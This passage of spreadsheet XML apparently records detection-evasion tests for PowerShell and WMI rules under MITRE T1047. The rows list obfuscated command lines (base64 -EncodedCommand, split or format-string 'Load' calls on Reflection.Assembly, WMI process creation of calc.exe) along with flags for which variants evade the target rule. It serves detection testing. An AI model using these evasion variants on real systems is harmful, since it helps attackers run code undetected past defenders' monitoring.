          <t>powershell.exe -ENCodEdCOmMand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F3137" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3137" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3137" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3137" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J3137" s="43" t="n"/>
      <c r="K3137" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3138" ht="15.75" customHeight="1" s="42">
      <c r="A3138" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3138" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C3138" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D3138" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E3138" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EnCoDEDCoMMAND WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F3138" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3138" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3138" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3138" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J3138" s="43" t="n"/>
      <c r="K3138" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3139" ht="15.75" customHeight="1" s="42">
      <c r="A3139" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3139" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C3139" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D3139" s="43" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E3139" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$m = 'Load'; [Reflection.Assembly]::$m.Invoke($data)"</t>
        </is>
      </c>
      <c r="F3139" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3139" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3139" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3139" s="43" t="n"/>
      <c r="J3139" s="43" t="n"/>
      <c r="K3139" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3140" ht="15.75" customHeight="1" s="42">
      <c r="A3140" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3140" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C3140" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D3140" s="43" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E3140" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[Reflection.Assembly]::('L'+'o'+'ad').Invoke($data)"</t>
        </is>
      </c>
      <c r="F3140" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3140" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3140" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3140" s="43" t="n"/>
      <c r="J3140" s="43" t="n"/>
      <c r="K3140" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3141" ht="15.75" customHeight="1" s="42">
      <c r="A3141" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3141" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C3141" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D3141" s="43" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E3141" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Reflection.Assembly]::("{1}{0}" -f 'oad','L').Invoke($data)"</t>
        </is>
      </c>
      <c r="F3141" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3141" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3141" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3141" s="43" t="n"/>
      <c r="J3141" s="43" t="n"/>
      <c r="K3141" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3142" ht="15.75" customHeight="1" s="42">
      <c r="A3142" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3142" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C3142" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D3142" s="43" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E3142" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "[Reflection.Assembly]::(" {1}{0}" -F 'oad' ,'L').Invoke($data)"</t>
        </is>
      </c>
      <c r="F3142" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3142" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3142" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3142" s="43" t="n"/>
      <c r="J3142" s="43" t="n"/>
      <c r="K3142" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3143" ht="15.75" customHeight="1" s="42">
      <c r="A3143" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3143" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C3143" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D3143" s="43" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E3143" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -coMMANd "[Reflection.Assembly]::(" {1}{0}" -F 'oad' ,'L').Invoke($data)"</t>
        </is>
      </c>
      <c r="F3143" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3143" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3143" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3143" s="43" t="n"/>
      <c r="J3143" s="43" t="n"/>
      <c r="K3143" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3144" ht="15.75" customHeight="1" s="42">
      <c r="A3144" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3144" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C3144" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D3144" s="43" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E3144" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[Reflection.Assembly]::(" {1}{0}" -F 'oad' ,'L').Invoke($data)"</t>
        </is>
      </c>
      <c r="F3144" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3144" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3144" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3144" s="43" t="n"/>
      <c r="J3144" s="43" t="n"/>
      <c r="K3144" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3145" ht="15.75" customHeight="1" s="42">
      <c r="A3145" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3145" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C3145" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D3145" s="43" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E3145" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -coMMaNd "[Reflection.Assembly]::(" {1}{0}" -f 'oad' ,'L').Invoke($data)"</t>
        </is>
      </c>
      <c r="F3145" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3145" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3145" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3145" s="43" t="n"/>
      <c r="J3145" s="43" t="n"/>
      <c r="K3145" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3146" ht="15.75" customHeight="1" s="42">
      <c r="A3146" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3146" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C3146" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D3146" s="43" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E3146" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[Reflection.Assembly]::(" {1}{0}" -"f" 'oad' ,'L').Invoke($data)"</t>
        </is>
      </c>
      <c r="F3146" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3146" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3146" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3146" s="43" t="n"/>
      <c r="J3146" s="43" t="n"/>
      <c r="K3146" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3147" ht="15.75" customHeight="1" s="42">
      <c r="A3147" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3147" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C3147" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D3147" s="43" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E3147" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[Reflection.Assembly]::(" {1}{0}" -F 'oad' ,'L').Invoke($data)"</t>
        </is>
      </c>
      <c r="F3147" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3147" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3147" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3147" s="43" t="n"/>
      <c r="J3147" s="43" t="n"/>
      <c r="K3147" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3148" ht="15.75" customHeight="1" s="42">
      <c r="A3148" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3148" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C3148" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D3148" s="43" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E3148" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "[Reflection.Assembly]::(" {1}{0}" -f 'oad' ,'L').Invoke($data)"</t>
        </is>
      </c>
      <c r="F3148" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3148" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3148" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3148" s="43" t="n"/>
      <c r="J3148" s="43" t="n"/>
      <c r="K3148" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3149" ht="15.75" customHeight="1" s="42">
      <c r="A3149" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3149" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C3149" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D3149" s="43" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E3149" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$w='Win32\_'; $p='Process'; Get-CimInstance -ClassName ($w+$p)"</t>
        </is>
      </c>
      <c r="F3149" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3149" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3149" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3149" s="43" t="n"/>
      <c r="J3149" s="43" t="n"/>
      <c r="K3149" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3150" ht="15.75" customHeight="1" s="42">
      <c r="A3150" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3150" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C3150" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D3150" s="43" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E3150" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V2luMzJf')) + [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('UHJvY2Vzcw=='))"</t>
        </is>
      </c>
      <c r="F3150" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3150" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3150" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3150" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J3150" s="43" t="n"/>
      <c r="K3150" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3151" ht="15.75" customHeight="1" s="42">
      <c r="A3151" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3151" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C3151" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D3151" s="43" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E3151" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V2luMzJf')) + [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('UHJvY2Vzcw=='))"</t>
        </is>
      </c>
      <c r="F3151" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3151" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3151" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3151" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J3151" s="43" t="n"/>
      <c r="K3151" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3152" ht="15.75" customHeight="1" s="42">
      <c r="A3152" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3152" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C3152" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D3152" s="43" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E3152" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Get-WmiObject -Class ([char[]](https://www.google.com/search?q=87,105,110,51,50,95,80,114,111,99,101,115,115) -join '')"</t>
        </is>
      </c>
      <c r="F3152" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3152" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3152" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3152" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J3152" s="43" t="n"/>
      <c r="K3152" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3153" ht="15.75" customHeight="1" s="42">
      <c r="A3153" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3153" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C3153" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D3153" s="43" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E3153" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-WmiObject -Class ([char[]](https://www.google.com/search?q=87,105,110,51,50,95,80,114,111,99,101,115,115) -join '')"</t>
        </is>
      </c>
      <c r="F3153" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3153" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3153" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3153" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J3153" s="43" t="n"/>
      <c r="K3153" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3154" ht="15.75" customHeight="1" s="42">
      <c r="A3154" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3154" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C3154" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D3154" s="43" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E3154" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"e" JABjAGwAYQBzAHMAIAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAgAC0AEwAaQBzAHQAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4ATgBhAG0AZQAgAC0AbQBhAHQAYwBoACAAIgBeAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AEMAbwBwAHkAJAAiAH0AKQAuAE4AYQBtAGUA</t>
        </is>
      </c>
      <c r="F3154" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3154" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3154" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3154" s="43" t="n"/>
      <c r="J3154" s="43" t="n"/>
      <c r="K3154" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3155" ht="15.75" customHeight="1" s="42">
      <c r="A3155" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3155" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C3155" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D3155" s="43" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E3155" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand"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3155" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3155" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3155" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3155" s="43" t="n"/>
      <c r="J3155" s="43" t="n"/>
      <c r="K3155" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3156" ht="15.75" customHeight="1" s="42">
      <c r="A3156" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3156" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C3156" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D3156" s="43" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E3156" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" JABjACAAPQAgACcAVwBpAG4AMwAyAF8AJwAgACsAIAAnAFAAcgBvAGMAZQBzAHMAJwA7ACAASQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AQwBsAGEAcwBzACAAJABjACAALQBOAGEAbQBlACAAQwByAGUAYQB0AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAEkAcwB0ACAAIgBjAGEAbABjAC4AZQB4AGUAIgA=</t>
        </is>
      </c>
      <c r="F3156" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3156" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3156" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3156" s="43" t="n"/>
      <c r="J3156" s="43" t="n"/>
      <c r="K3156" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3157" ht="15.75" customHeight="1" s="42">
      <c r="A3157" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3157" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C3157" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D3157" s="43" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E3157" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AQwBsAGEAcwBzACAAdwBJAG4AMwAyAF8AcAByAE8AYwBlAFMAcwAgAC0ATgBhAG0AZQAgAEMAcgBlAGEAdABlACAALQBBAHIAZwB1AG0AZQBuAHQATABJAHMAdAAgACIAYwBhAGwAYwAuAGUAeABlACIA</t>
        </is>
      </c>
      <c r="F3157" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3157" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3157" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3157" s="43" t="n"/>
      <c r="J3157" s="43" t="n"/>
      <c r="K3157" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3158" ht="15.75" customHeight="1" s="42">
      <c r="A3158" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3158" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C3158" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D3158" s="43" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E3158" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AQwBsAGEAcwBzACAAdwBJAG4AMwAyAF8AcAByAE8AYwBlAFMAcwAgAC0ATgBhAG0AZQAgAEMAcgBlAGEAdABlACAALQBBAHIAZwB1AG0AZQBuAHQATABJAHMAdAAgACIAYwBhAGwAYwAuAGUAeABlACIA</t>
        </is>
      </c>
      <c r="F3158" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3158" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3158" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3158" s="43" t="n"/>
      <c r="J3158" s="43" t="n"/>
      <c r="K3158" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3159" ht="15.75" customHeight="1" s="42">
      <c r="A3159" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3159" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C3159" s="43" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D3159" s="43" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E3159" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand Q29udmVydFRvLVNlY3VyZVN0cmluZyAtU3RyaW5nICdQYXNzd29yZCcgLUFzUGxhaW5UZXh0IC1Gb3JjZQ==</t>
        </is>
      </c>
      <c r="F3159" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3159" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3159" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3159" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J3159" s="43" t="n"/>
      <c r="K3159" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3160" ht="15.75" customHeight="1" s="42">
      <c r="A3160" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3160" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C3160" s="43" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D3160" s="43" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E3160" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" Q29udmVydFRvLVNlY3VyZVN0cmluZyAtU3RyaW5nICdQYXNzd29yZCcgLUFzUGxhaW5UZXh0IC1Gb3JjZQ==</t>
        </is>
      </c>
      <c r="F3160" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3160" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3160" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3160" s="43" t="n"/>
      <c r="J3160" s="43" t="n"/>
      <c r="K3160" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3161" ht="15.75" customHeight="1" s="42">
      <c r="A3161" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3161" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C3161" s="43" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D3161" s="43" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E3161" s="43" t="inlineStr">
        <is>
